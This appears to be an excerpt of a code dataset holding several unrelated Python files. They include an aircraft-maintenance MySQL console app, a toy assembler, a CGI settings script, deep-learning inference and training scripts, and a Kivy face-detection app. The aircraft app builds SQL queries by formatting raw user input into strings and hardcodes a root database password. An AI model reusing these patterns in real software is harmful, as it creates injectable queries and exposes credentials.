dtd, parts)\n cursor.execute(sql)\n db.commit()\n sql = \"INSERT INTO CHANGED_PART (MAINTENANCE_REPORT_ID, PART_ID) VALUES (LAST_INSERT_ID(), %d);\" %(pid)\n cursor.execute(sql)\n db.commit()\n except:\n print(\"Error\")\n\ndef view_Maintenance():\n try:\n sql = \"SELECT R.ID, R.PLANE_MODEL_ID, A.ID AUDITOR_ID, A.NAME AUDITOR_NAME, R.MAINTENANCE_DATA, C.PART_ID, R.COST FROM MAINTENANCE_REPORTS R, AUDIT_AGENCY A, CHANGED_PART C WHERE A.ID = R.AUDITOR_ID AND R.ID = C.MAINTENANCE_REPORT_ID;\"\n cursor.execute(sql)\n db.commit()\n row = cursor.fetchone()\n while row is not None:\n print(row)\n row = cursor.fetchone() \n except:\n print(\"Error\")\n\ndef add_Crashreport():\n print(\"Enter the following details\")\n cname = input(\"Investigating agency name: \")\n pname = input(\"Plane model name: \")\n qty = input(\"Reason for crash: \")\n prog = input(\"Casualities: \")\n dtp = input(\"date of purchase: \")\n dtd = input(\"date of incident: \")\n dtm = input(\"date of last maintenance check: \")\n pid = input(\"id of the part that caused incident: \")\n \n sql = \"INSERT INTO CRASHREPORTS (PLANE_MODEL_ID, DATE_OF_PURCHASE, DATE_OF_INCIDENT,DATE_OF_LAST_MAINTENANCE_CHECK, REASEON_FOR_CRASH, INVESTIGATING_AGENCY, CASUALITIES) VALUES ((SELECT ID FROM PLANE WHERE NAME LIKE '%s'), %s, %s, %s, %s, (SELECT ID FROM PURCHASE WHERE NAME 
LIKE '%s'), '%s'))\" %(pname, dtp, dtd, dtm, qty, cname, prog)\n\n try:\n cursor.execute(sql)\n db.commit()\n sql = \"INSERT INTO PART_FAILURE_CRASH VALUES (LAST_INSERT_ID(), %s)\" %(pid)\n cursor.execute(sql)\n db.commit()\n except:\n print(\"Error\")\n\ndef view_Crashreport():\n sql = \"SELECT C.*, A.NAME INVESTING_AGENCY_NAME, P.PART_ID PART_FAILED FROM CRASHREPORTS C, AUDIT_AGENCY A, PART_FAILURE_CRASH P WHERE C.ID = P.CRASHREPORT_ID AND C.INVESTIGATING_AGENCY = A.ID;\"\n try:\n cursor.execute(sql)\n db.commit()\n row = cursor.fetchone()\n while row is not None:\n print(row)\n row = cursor.fetchone()\n except:\n print(\"Error\")\n\ndef Employee():\n while(1):\n print(\"You can choose from the following options\")\n print(\"1. Add a new purchase\")\n print(\"2. View all purchases till a date\")\n print(\"3. Add a new maintenance check\")\n print(\"4. View all Maintenance checks till a date\")\n print(\"5. Add a new crash report\")\n print(\"6. View all Crash reports till a date\")\n print(\"7. Quit\")\n inp = int(input(\"Enter a number now: \"))\n if inp == 1:\n add_Purchase()\n elif inp == 2:\n view_Purchase()\n elif inp == 3:\n add_Maintenance()\n elif inp == 4:\n view_Maintenance()\n elif inp == 5:\n add_Crashreport()\n elif inp == 6:\n view_Crashreport()\n elif inp == 7:\n return\n else:\n print(\"Incorrect number\")\n\n\n# ----- EMPLOYEE END -------\n\n# ----- ANALYSIS START -----\n\ndef Parts_analysis():\n print(\"Following are the available parts:\")\n display(\"PARTS\")\n\n try:\n part = int(input(\"Enter the part id for which you want to check the reports: \"))\n sql = \"SELECT C.ID CRASH_ID, C.DATE_OF_PURCHASE, C.DATE_OF_INCIDENT, M.ID MANUFACTURER_ID, M.NAME MANUFACTURER_NAME FROM CRASHREPORTS C, PARTS P, PART_FAILURE_CRASH F, COMPANY M WHERE P.ID = %d AND F.PART_ID = P.ID AND M.ID = P.MANUFACTURER_ID AND C.ID = F.CRASHREPORT_ID;\" % (\n part)\n cursor.execute(sql)\n row = cursor.fetchone()\n while row is not None:\n print(row)\n row = cursor.fetchone() \n except:\n print(\"Error\")\n\ndef Maintainence_cost():\n print(\"Following are the available parts:\")\n display(\"PARTS\")\n\n try:\n part = int(input(\"Enter the part id for which you want to check the maintainence reports: \"))\n sql = \"SELECT M.ID MANUFACTURER_ID, M.NAME MANUFACTURER_NAME, IFNULL(SUM(R.COST),0) TOTAL_COST FROM MAINTENANCE_REPORTS R, CHANGED_PART C, PARTS P, COMPANY M WHERE P.ID = %d AND C.PART_ID = P.ID AND M.ID = P.MANUFACTURER_ID AND C.MAINTENANCE_REPORT_ID = R.ID;\" % (\n part)\n cursor.execute(sql)\n row = cursor.fetchone()\n while row is not None:\n print(row)\n row = cursor.fetchone() \n except:\n print(\"Error\")\n\ndef Maintainence_cost_per_part():\n try:\n sql = \"SELECT P.ID PART_ID, SUM(R.COST) TOTAL_COST FROM MAINTENANCE_REPORTS R, CHANGED_PART C, PARTS P WHERE C.PART_ID = P.ID AND C.MAINTENANCE_REPORT_ID = R.ID GROUP BY P.ID;\"\n cursor.execute(sql)\n row = cursor.fetchone()\n while row is not None:\n print(row)\n row = cursor.fetchone() \n except:\n print(\"Error\")\n\ndef Revenue_per_purchaser():\n print(\"Following are the revenue generated per purchasers:\")\n try:\n sql = \"SELECT P.ID, P.NAME, ABS(SUM(S.COST) - SUM(R.COST)) REVENUE FROM PURCHASER P, LIST_OF_PLANES L, SALE S, MAINTENANCE_REPORTS R WHERE L.SALE_ID = S.ID AND L.PURCHASER_ID = P.ID AND R.PLANE_MODEL_ID = L.ID AND S.COMPANY_ID = P.ID GROUP BY P.ID;\"\n cursor.execute(sql)\n row = cursor.fetchone()\n while row is not None:\n print(row)\n row = cursor.fetchone() \n except:\n print(\"Error\")\n\ndef analysis():\n\n 
while(1):\n tmp = sp.call('clear', shell=True)\n print(\"1. Analysis of crash report of companies manufacturing a part\")\n print(\"2. Analysis of maintenance of a part and companies manufacturing a part\")\n print(\"3. Analysis of all the parts and the cost spent in manufacturing them\")\n print(\"4. Analysis of total revenue generated from a purchaser\")\n print(\"5. Quit\")\n ch = int(input(\"Enter choice :> \"))\n\n if ch is 5:\n break\n else:\n if ch == 1:\n Parts_analysis()\n elif ch == 2:\n Maintainence_cost()\n elif ch == 3:\n Maintainence_cost_per_part()\n elif ch == 4:\n Revenue_per_purchaser()\n else:\n print(\"Incorrect number\")\n\n# ----- ANALYSIS END -----\n\ndef user_config(ch):\n if ch is 1:\n admin()\n elif ch is 2:\n Employee()\n elif ch is 3:\n analysis()\n else:\n print(\"Error: User does not exist\")\n\ntmp = sp.call('clear',shell=True)\n\ntry:\n con = db = pymysql.connect(\"localhost\",\"root\",\"Ainsley768692\",\"BOEING\")\n tmp = sp.call('clear',shell=True)\n\n if(con.open):\n print(\"Connected\")\n else:\n print(\"Failed to connect\")\n\nexcept:\n tmp = sp.call('clear',shell=True)\n print(\"Connection Refused: Either username or password is incorrect or user doesn't have access to database\")\n tmp = input(\"Enter any key to CONTINUE>\")\n # Without a connection, the `with con:` block below would raise NameError, so exit here.\n quit()\n\nwith con:\n cursor = cur = con.cursor()\n tmp = sp.call('clear',shell=True)\n print(\"1. Admin\")\n print(\"2. Employee\")\n print(\"3. Analyst\")\n print(\"4. Quit\")\n\n ch = int(input(\"Enter choice :> \"))\n tmp = sp.call('clear',shell=True)\n if ch>4 or ch<1:\n print(\"User does not exist. Abort.\")\n else:\n user_config(ch)\n tmp = input(\"Enter any key to CONTINUE>\")","sub_path":"project/functional_final.py","file_name":"functional_final.py","file_ext":"py","file_size_in_byte":21086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"623157446","text":"def tokenize(line,tagDict,numLine):\n inst = line.lower()\n if ':' in inst:\n inst = inst.replace(':','')\n inst = inst.replace('\\n','')\n tagDict[inst] = numLine\n return []\n elif \"j\" in inst:\n aux = inst.split()\n inst = [\"j\", tagDict[aux[1]]]\n else:\n inst = inst.replace('#','')\n inst = inst.replace(',',' ')\n inst = inst.split()\n return inst\n\ndef complement16(binLines):\n for i in range(len(binLines)):\n lenLine = len(binLines[i])\n if lenLine < 16:\n for j in range(16 - lenLine):\n binLines[i] = binLines[i] + \"0\"\n elif lenLine > 16:\n print(\"Incorrect Structure, please review\")\n print(\"0 fill\")\n quit()\n \n\ndef getInst(filename):\n instList = []\n tagDict = {}\n insts = open(filename,\"r\")\n lenAux = open(filename,\"r\")\n length = len(lenAux.readlines())\n for i in range(length):\n instList.append(tokenize(insts.readline(),tagDict,i))\n return writeMif(instList)\n\ndef writeMif(instList):\n binLines = []\n for inst in instList:\n if len(inst)>0:\n if \"add\" in inst[0]:\n processAdd(binLines,inst)\n elif \"sub\" in inst[0]:\n processSub(binLines,inst)\n elif \"vxor\" in inst[0]:\n processVxor(binLines,inst,\"00\")\n elif \"vld\" in inst[0]:\n processVld(binLines,inst,\"00\")\n elif \"vstr\" in inst[0]:\n processVstr(binLines,inst,\"00\")\n elif \"vsr\" in inst[0]:\n processVsr(binLines,inst,\"00\")\n elif \"vsl\" in inst[0]:\n processVsr(binLines,inst,\"00\")\n elif \"vswap\" in inst[0]:\n processVswap(binLines,inst,\"00\")\n elif \"j\" in inst[0]:\n processJump(binLines,inst,\"00\")\n elif \"cmp\" in inst[0]:\n 
processCmp(binLines,inst,\"00\")\n elif \"nop\" in inst[0]:\n binLines.append(\"0000000000001101\")\n elif \"end\" in inst[0]:\n binLines.append(\"0000000000001110\")\n else:\n print(\"Incorrect Structure, please review\")\n print(\"Inst:\",inst)\n print(\"mif fill\")\n quit()\n complement16(binLines)\n lenBinLines = len(binLines)\n memLen = 512\n f = open(\"inst.mif\",\"w\")\n f.write(\"WIDTH=16;\\n\")\n f.write(\"DEPTH={};\\n\\n\".format(memLen))\n f.write(\"ADDRESS_RADIX=UNS;\\n\")\n f.write(\"DATA_RADIX=BIN;\\n\\n\")\n f.write(\"CONTENT BEGIN\\n\")\n for i in range(lenBinLines):\n f.write(\"\\t{}\\t:\\t{};\\n\".format(i,binLines[i]))\n f.write(\"\\t[{}..{}]\\t:\\t0;\\n\".format(lenBinLines,memLen-1))\n f.write(\"END;\")\n f.close()\n\n\ndef processCondCode(inst):\n if \"ne\" in inst[0]:\n inst[0] = inst[0].replace(\"ne\",'')\n return \"11\"\n elif \"eq\" in inst[0]:\n inst[0] = inst[0].replace(\"eq\",'')\n return \"00\"\n elif \"gt\" in inst[0]:\n inst[0] = inst[0].replace(\"gt\",'')\n return \"01\"\n elif \"al\" in inst[0]:\n inst[0] = inst[0].replace(\"al\",'')\n return \"10\"\n else:\n print(\"Incorrect Structure, please review\")\n print(\"cond code\")\n print(\"Inst:\",inst)\n quit()\n\ndef processReg(reg):\n if '10' in reg:\n return '1010'\n elif '11' in reg:\n return '1011'\n elif '12' in reg:\n return '1100'\n elif '13' in reg:\n return '1101'\n elif '14' in reg:\n return '1110'\n elif '15' in reg:\n return '1111'\n elif '0' in reg:\n return '0000'\n elif '1' in reg:\n return '0001'\n elif '2' in reg:\n return '0010'\n elif '3' in reg:\n return '0011'\n elif '4' in reg:\n return '0100'\n elif '5' in reg:\n return '0101'\n elif '6' in reg:\n return '0110'\n elif '7' in reg:\n return '0111'\n elif '8' in reg:\n return '1000'\n elif '9' in reg:\n return '1001'\n else:\n print(\"Incorrect Structure, please review\")\n print(\"reg code\")\n print(\"Inst:\",inst)\n quit()\n\ndef processVect(vect):\n if '0' in vect:\n return '00'\n elif '1' in vect:\n return '01'\n elif '2' in vect:\n return '10'\n elif '3' in vect:\n return '11'\n else:\n print(\"Incorrect Structure, please review\")\n quit()\n\ndef processImm(imm, bits):\n num = int(imm)\n binStr = bin(num).replace('0b','')\n binLen = len(binStr)\n if binLen < bits:\n for i in range(bits - binLen):\n binStr = '0' + binStr\n elif binLen > bits:\n print(\"Incorrect Structure, please review\")\n print(\"imm code\")\n print(\"Inst:\",inst)\n quit()\n return binStr\n \ndef processAdd(binLines,inst):\n if inst[0] == \"add\":\n rd = processReg(inst[1])\n op1 = processReg(inst[2])\n op2 = processReg(inst[3])\n post = \"1001\"\n res = rd + op1 + op2 + post\n binLines.append(res)\n elif inst[0] == \"addi\":\n rd = processReg(inst[1])\n op1 = processReg(inst[2])\n imm = processImm(inst[3],4)\n post = \"1011\"\n res = rd + op1 + imm + post\n binLines.append(res)\n else:\n print(\"Incorrect Structure, please review\")\n print(\"add code\")\n print(\"Inst:\",inst)\n quit()\n\ndef processSub(binLines,inst):\n if inst[0] == \"sub\":\n rd = processReg(inst[1])\n op1 = processReg(inst[2])\n op2 = processReg(inst[3])\n post = \"1010\"\n res = rd + op1 + op2 + post\n binLines.append(res)\n elif inst[0] == \"subi\":\n rd = processReg(inst[1])\n op1 = processReg(inst[2])\n imm = processImm(inst[3],4)\n post = \"1100\"\n res = rd + op1 + imm + post\n binLines.append(res)\n else:\n print(\"Incorrect Structure, please review\")\n print(\"sub code\")\n print(\"Inst:\",inst)\n quit()\n\ndef processVxor(binLines,inst,condCode):\n if inst[0] == \"vxor\":\n 
vregoper = processVect(inst[1])\n vregres = processVect(inst[2])\n reg = processReg(inst[3])\n post = \"00010\"\n res = condCode + \"0\" + vregoper + vregres + reg + post\n binLines.append(res)\n elif inst[0] == \"vxori\":\n vregoper = processVect(inst[1])\n vregres = processVect(inst[2])\n imm = processImm(inst[3],5)\n post = \"0011\"\n res = condCode + \"1\" + vregoper + vregres + imm + post\n binLines.append(res)\n else:\n condCode = processCondCode(inst)\n processVxor(binLines,inst,condCode)\n\ndef processVld(binLines,inst,condCode):\n if inst[0] == \"vld\":\n rdir = processReg(inst[1])\n vregdest = processVect(inst[2])\n span = processImm(inst[3],3)\n post = \"00100\"\n res = condCode + rdir + vregdest + span + post\n binLines.append(res)\n else:\n condCode = processCondCode(inst)\n processVld(binLines,inst,condCode)\n\ndef processVstr(binLines,inst,condCode):\n if inst[0] == \"vstr\":\n rdir = processReg(inst[1])\n vregdest = processVect(inst[2])\n span = processImm(inst[3],3)\n post = \"00101\"\n res = condCode + rdir + vregdest + span + post\n binLines.append(res)\n else:\n condCode = processCondCode(inst)\n processVstr(binLines,inst,condCode)\n\ndef processVsr(binLines,inst,condCode):\n if inst[0] == \"vsr\":\n vregoper = processVect(inst[1])\n vregres = processVect(inst[2])\n reg = processReg(inst[3])\n post = \"00110\"\n res = condCode + \"0\" + vregoper + vregres + reg + post\n binLines.append(res)\n elif inst[0] == \"vsl\":\n vregoper = processVect(inst[1])\n vregres = processVect(inst[2])\n reg = processReg(inst[3])\n post = \"00111\"\n res = condCode + \"0\" + vregoper + vregres + reg + post\n binLines.append(res)\n else:\n condCode = processCondCode(inst)\n processVsr(binLines,inst,condCode)\n\ndef processVswap(binLines,inst,condCode):\n if inst[0] == \"vswap\":\n vregoper = processVect(inst[1])\n vregdest = processVect(inst[2])\n bitOrigin = processImm(inst[3],3)\n bitDest = processImm(inst[4],3)\n post = \"1000\"\n res = condCode + vregoper + vregdest + bitOrigin + bitDest + post\n binLines.append(res)\n else:\n condCode = processCondCode(inst)\n processVswap(binLines,inst,condCode)\n\ndef processJump(binLines,inst,condCode):\n if inst[0] == \"j\":\n imm = processImm(inst[1],10)\n post = \"0001\"\n res = condCode + imm + post\n binLines.append(res)\n else:\n condCode = processCondCode(inst)\n processJump(binLines,inst,condCode)\n\ndef processCmp(binLines,inst,condCode):\n if inst[0] == \"cmp\":\n op1 = processReg(inst[1])\n op2 = processReg(inst[2])\n post = \"000000\"\n res = condCode + op1 + op2 + post\n binLines.append(res)\n else:\n condCode = processCondCode(inst)\n processCmp(binLines,inst,condCode)\n\ngetInst(\"demo.txt\")\n","sub_path":"compilador/compilador.py","file_name":"compilador.py","file_ext":"py","file_size_in_byte":9089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"640459002","text":"#!/usr/bin/python3\n\nimport cgi\nimport json\n\nform = cgi.FieldStorage()\n\ngoalLux = int(form.getvalue('goalLux'))\nchlorophyll = str(form.getvalue('chlorophyll'))\nallowingOfAUser = form.getvalue('allowingOfAUser') == 'true'\n\n\nfile_path = '/var/www/html/lightSetting.json'\njson_data = {}\n\n\nwith open(file_path, 'r') as json_file:\n json_data = json.load(json_file)\n json_data[\"goalLux\"] = goalLux\n json_data[\"chlorophyll\"] = chlorophyll\n json_data[\"allowingOfAUser\"] = allowingOfAUser\n \nwith open(file_path, 'w') as outfile:\n json.dump(json_data, outfile, indent='\\t')\n\nprint('Content-type: 
text/plain')\nprint()\nprint(f'goalLux:{goalLux}')\nprint(f'chlorophyll:{chlorophyll}')\nprint(f'allowingOfAUser:{allowingOfAUser}')\nprint(json_data)\n","sub_path":"light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"357187813","text":"import torch\nfrom torch import nn, optim\nfrom pathlib import Path\n\nfrom utils.run_utils import initialize, save_dict_as_json, get_logger, create_arg_parser\nfrom utils.train_utils import create_cycle_data_loaders_axial_infer_3axis_microbead\n\nfrom data.input_transforms import PreProcessInfer_3axis\nfrom data.output_transforms import OutputTransform_3axis\n\nfrom models.fc_unet import Unet\nfrom eval_scripts.Inference_microbead import Infer_CU\n\n\ndef train_img(args):\n\n # Creating checkpoint and logging directories, as well as the run name.\n ckpt_path = Path(args.ckpt_root)\n ckpt_path.mkdir(exist_ok=True)\n\n ckpt_path = ckpt_path\n ckpt_path.mkdir(exist_ok=True)\n\n run_number, run_name = initialize(ckpt_path)\n\n ckpt_path = ckpt_path / run_name\n ckpt_path.mkdir(exist_ok=True)\n\n log_path = Path(args.log_root)\n log_path.mkdir(exist_ok=True)\n\n log_path = log_path\n log_path.mkdir(exist_ok=True)\n\n log_path = log_path / run_name\n log_path.mkdir(exist_ok=True)\n\n logger = get_logger(name=__name__, save_file=log_path / run_name)\n\n # Assignment inside running code appears to work.\n if (args.gpu is not None) and torch.cuda.is_available():\n device = torch.device(f'cuda:{args.gpu}')\n logger.info(f'Using GPU {args.gpu} for {run_name}')\n else:\n device = torch.device('cpu')\n logger.info(f'Using CPU for {run_name}')\n\n # Saving peripheral variables and objects in args to reduce clutter and make the structure flexible.\n args.run_number = run_number\n args.run_name = run_name\n args.ckpt_path = ckpt_path\n args.log_path = log_path\n args.device = device\n\n save_dict_as_json(vars(args), log_dir=log_path, save_name=run_name)\n\n # UNET architecture requires that all inputs be dividable by some power of 2.\n divisor = 2 ** args.num_pool_layers\n\n eval_input_transform = PreProcessInfer_3axis(args.device, use_seed=False, divisor=divisor)\n\n # DataLoaders\n eval_loader = create_cycle_data_loaders_axial_infer_3axis_microbead(args)\n\n eval_output_transform = OutputTransform_3axis()\n\n data_chans = args.depth\n\n modelG = Unet(in_chans=data_chans, out_chans=data_chans, chans=args.chans,\n num_pool_layers=args.num_pool_layers).to(device)\n\n if args.load_ckpt:\n model_ckpt = args.prev_model_ckpt\n save_dict = torch.load(model_ckpt)\n modelG.load_state_dict(save_dict['model_state_dict'])\n print('Loaded model checkpoint')\n\n trainer = Infer_CU(args, modelG, eval_loader, eval_input_transform, eval_output_transform)\n\n trainer.inference_axial_from_coronal(args)\n\n\nif __name__ == '__main__':\n\n settings = dict(\n # Variables that almost never change.\n name='test',\n data_root='./dataset/microbead',\n specimen_type='20180726.150404.579.SiO2_5um-001',\n log_root='./logs',\n ckpt_root='./checkpoints',\n batch_size=1,\n chans=32,\n num_pool_layers=3,\n\n # Variables that occasionally change.\n num_workers=0,\n gpu=0, # Set to None for CPU mode.\n use_residual=False,\n depth=1,\n verbose=False,\n sample_rate=1,\n\n # Prev model ckpt\n load_ckpt=True,\n prev_model_ckpt='./checkpoints/microbead/ckpt.tar',\n\n # Evaluation\n save_fdir='./recons/microbead'\n )\n options = create_arg_parser(**settings).parse_args()\n 
train_img(options)","sub_path":"Infer_microbead.py","file_name":"Infer_microbead.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"393977126","text":"from kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.properties import ObjectProperty\nfrom random import randint\nimport cv2.cv2 as cv2\n\n\nclass WindowMenu(Screen):\n\timg_inp = ObjectProperty(None)\n\timg_exp = ObjectProperty(None)\n\tnr_zdj_text = ObjectProperty(None)\n\ttryb_text = ObjectProperty(None)\n\tmode = 'default'\n\tnr = 1\n\n\tdef random_img(self):\n\t\tnew_nr = randint(1, 16)\n\t\twhile new_nr == self.nr:\n\t\t\tnew_nr = randint(1, 16)\n\t\tself.load_img(new_nr)\n\n\tdef load_img(self, nr):\n\t\tself.nr = nr\n\t\tself.nr_zdj_text.text = f'Aktualne zdjęcie: {nr}'\n\t\tself.img_inp.source = f'./Image_Input/{nr}.jpg'\n\t\tself.img_inp.reload()\n\n\tdef change_mode(self, tryb):\n\t\tself.tryb_text.text = f'Tryb: {tryb.upper()}'\n\t\tself.mode = tryb\n\n\tdef detect_faces(self):\n\t\timg = cv2.imread(self.img_inp.source)\n\t\tgray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t\tface_cascade = cv2.CascadeClassifier(f'cascades/data/haarcascade_frontalface_{self.mode}.xml')\n\t\tcolor = (0, 255, 0)\n\t\tface_rects = face_cascade.detectMultiScale(\n\t\t\tgray_img, scaleFactor=1.2, minNeighbors=3, minSize=(32, 32))\n\t\tif len(face_rects):\n\t\t\tfor faceRect in face_rects:\n\t\t\t\tx, y, w, h = faceRect\n\t\t\t\tcv2.rectangle(img, (x, y), (x + h, y + w), color, 2)\n\n\t\tcv2.imshow('image', img)\n\n\nclass WindowManager(ScreenManager):\n\tpass\n\n\nkv = Builder.load_file('ui.kv')\n\n\nclass FaceRecApp(App):\n\tdef build(self):\n\t\treturn kv\n\n\nif __name__ == \"__main__\":\n\tFaceRecApp().run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"210610445","text":"import sys\nimport os\nsys.path.append(os.path.dirname(os.getcwd()))\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn.functional as F\nimport wandb\nfrom tqdm import tqdm\nfrom datetime import datetime\nimport pickle\n\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau, MultiStepLR\nfrom torch.utils.data import DataLoader\n\nimport config\nfrom config import TrainConfigViT as Config, BASE_DIR, GPU_ID\nfrom dataio.dataloader import probe_data_folder, BraTS18Binary\nfrom train_utils import log_stats_classification, write_stats_classification\nfrom loss import TauKLDivLoss, MarginalPenaltyLoss, MarginalsExtendedLoss\nfrom models.resnet import get_resnet50_attn_classifier\nfrom models.unet import get_unet_regressor, get_unet_encoder_classifier\n\n# Ignore pytorch warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = GPU_ID\n\nfrom timm.models.vision_transformer import _create_vision_transformer\n\ndef train(seed=None):\n raw_params = Config()\n # Serialize transforms\n train_transforms = raw_params.config.pop(\"train_transforms\")\n test_transforms = raw_params.config.pop(\"test_transforms\")\n raw_params.config[\"train_transforms\"] = {\"transforms\": train_transforms.__str__()}\n raw_params.config[\"test_transforms\"] = {\"test_transforms\": test_transforms.__str__()}\n\n params = raw_params.config\n\n # Set seed\n if seed is not None:\n 
params[\"seed\"] = seed\n random.seed(params[\"seed\"])\n np.random.seed(params[\"seed\"])\n torch.manual_seed(params[\"seed\"])\n\n wandb.init(project='regex',\n entity='tomron27',\n job_type=\"eval\",\n reinit=True,\n config=params,\n notes=params[\"name\"],\n group=params[\"group\"])\n\n train_metadata, val_metadata, class_counts = probe_data_folder(params[\"data_path\"],\n train_frac=params[\"train_frac\"],\n bad_files=params[\"bad_files\"],\n subsample_frac=params[\"subsample_frac\"],\n count_classes=True)\n ### DEBUG\n # train_metadata, val_metadata = train_metadata[:128], val_metadata[:128]\n\n # Datasets\n train_dataset = BraTS18Binary(params[\"data_path\"],\n train_metadata,\n transforms=train_transforms,\n shuffle=True,\n random_state=params[\"seed\"],\n prefetch_data=params[\"prefetch_data\"])\n val_dataset = BraTS18Binary(params[\"data_path\"],\n val_metadata,\n transforms=test_transforms,\n prefetch_data=params[\"prefetch_data\"],\n shuffle=False)\n\n # Dataloaders\n train_loader = DataLoader(dataset=train_dataset,\n num_workers=params[\"num_workers\"],\n pin_memory=True,\n batch_size=params[\"batch_size\"])\n val_loader = DataLoader(dataset=val_dataset,\n num_workers=params[\"num_workers\"],\n pin_memory=True,\n batch_size=params[\"batch_size\"],\n shuffle=False)\n\n vit_params = {\n \"pretrained\": params[\"pretrained\"],\n \"img_size\": params[\"spatial_dim\"],\n \"patch_size\": params[\"patch_size\"],\n \"in_chans\": params[\"channels\"],\n \"num_classes\": params[\"num_classes\"],\n \"embed_dim\": params[\"dim\"],\n \"depth\": params[\"depth\"],\n }\n model = _create_vision_transformer(\"vit_base_patch16_224\", **vit_params)\n total_params = sum(p.numel() for p in model.parameters())\n trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(\"Total parameters: {}\\nTotal trainable parameters: {}\".format(total_params, trainable_params))\n\n # Create log dir\n log_dir = os.path.join(params[\"log_path\"], params[\"name\"], datetime.now().strftime(\"%Y%m%d_%H:%M:%S\"))\n os.makedirs(log_dir)\n print(\"Log dir: '{}' created\".format(log_dir))\n pickle.dump(params, open(os.path.join(log_dir, \"params.p\"), \"wb\"))\n\n # CUDA\n device = torch.device(\"cuda\" if torch.cuda.is_available() and params[\"use_gpu\"] else \"cpu\")\n model = model.to(device)\n\n # Loss\n # criterion = torch.nn.MSELoss()\n criterion = torch.nn.CrossEntropyLoss()\n # criterion = TauKLDivLoss(attn_kl=params[\"attn_kl\"],\n # kl_weight=params[\"kl_weight\"],\n # detach_targets=params[\"detach_targets\"])\n # criterion = MarginalPenaltyLoss(attn_kl=params[\"attn_kl\"], kl_weight=params[\"kl_weight\"])\n # criterion = MarginalsExtendedLoss(attn_kl=params[\"attn_kl\"], kl_weight=params[\"kl_weight\"], detach_targets=params[\"detach_targets\"],)\n\n # Optimizer\n optimizer = torch.optim.Adam(model.parameters(), lr=params[\"lr\"])\n scheduler = ReduceLROnPlateau(optimizer, mode='min',\n factor=params[\"optim_factor\"],\n patience=params[\"optim_step\"],\n min_lr=1e-6,\n verbose=True)\n\n # Training\n best_val_score = 0.0\n save_dir = os.path.join(params[\"log_path\"], \"val_results\")\n os.makedirs(save_dir, exist_ok=True)\n for epoch in range(params[\"num_epochs\"]):\n train_stats, val_stats = {}, {}\n for fold in ['train', 'val']:\n print(f\"*** Epoch {epoch + 1} {fold} fold ***\")\n if fold == \"train\":\n model.train()\n for i, sample in tqdm(enumerate(train_loader), total=len(train_loader)):\n images, targets = sample\n images, targets = images.to(device, 
non_blocking=True), targets.to(device, non_blocking=True)\n outputs = model(images)\n if torch.isnan(outputs).any():\n print(\"Oops\")\n # losses = criterion(outputs, targets, marginals)\n # loss = losses[-1]\n loss = criterion(outputs, targets)\n losses = (loss,)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n current_lr = optimizer.param_groups[0]['lr'] if scheduler is not None else params[\"lr\"]\n log_stats_classification(train_stats, outputs, targets, losses, batch_size=params[\"batch_size\"],\n lr=current_lr)\n\n else:\n model.eval()\n with torch.no_grad():\n for i, sample in tqdm(enumerate(val_loader), total=len(val_loader)):\n images, targets = sample\n images, targets = images.to(device, non_blocking=True), targets.to(device, non_blocking=True)\n outputs = model(images)\n if torch.isnan(outputs).any():\n print(\"Oops\")\n loss = criterion(outputs, targets)\n losses = (loss,)\n current_lr = optimizer.param_groups[0]['lr'] if scheduler is not None else params[\"lr\"]\n log_stats_classification(val_stats, outputs, targets, losses, batch_size=params[\"batch_size\"],\n lr=current_lr)\n val_loss, val_score = write_stats_classification(train_stats, val_stats, epoch,\n ret_metric=params[\"save_metric\"])\n\n # progress LR scheduler\n if scheduler is not None:\n scheduler.step(val_loss)\n\n # Save parameters\n if val_score >= best_val_score and epoch >= params[\"min_epoch_save\"]:\n model_file = os.path.join(log_dir,params[\"name\"] + f'__best__epoch={epoch + 1:03d}_score={val_score:.4f}.pt')\n print(f'Model improved {params[\"save_metric\"]} from {best_val_score:.4f} to {val_score:.4f}')\n print(f'Saving model at \\'{model_file}\\' ...')\n torch.save(model.state_dict(), model_file)\n best_val_score = val_score\n wandb.run.summary[\"best_val_score\"] = best_val_score\n\n if params[\"chekpoint_save_interval\"] > 0:\n if epoch % params[\"chekpoint_save_interval\"] == 0 and epoch >= params[\"min_epoch_save\"]:\n model_file = os.path.join(log_dir,\n params[\"name\"] + f'__ckpt__epoch={epoch + 1:03d}_score={val_score:.4f}.pt')\n print(f\"Saving model at '{model_file}' ...\")\n torch.save(model.state_dict(), model_file)\n\n\nif __name__ == \"__main__\":\n # train()\n # for lamb in [0.1, 0.5]:\n # for lamb in [1e-4, 1e-3, 1e-2, 1e-1]:\n # train(lamb)\n # models = 5\n for i in range(5):\n print(f\"********** Ensemble iteration {i+1:02d} **********\")\n train(seed=i)\n","sub_path":"train_vit.py","file_name":"train_vit.py","file_ext":"py","file_size_in_byte":9258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"531299678","text":"def find_median(A):\n k = len(A) - len(A)//2 - 1\n maximum = max(A[0], A[k], A[-1])\n minimum = min(A[0], A[k], A[-1])\n if A[0] == maximum:\n if A[k] > A[-1]:\n return k\n return len(A)-1\n if A[0] == minimum:\n if A[k] > A[-1]:\n return len(A)-1\n return k\n return 0\n\n\ndef get_pivot(A, p):\n '''for array A, given pivot option, return the index of the pivot element'''\n if p == 'first':\n return(0)\n elif p == 'last':\n return len(A)-1\n elif p == 'middle':\n return find_median(A)\n else:\n print('wrong input. 
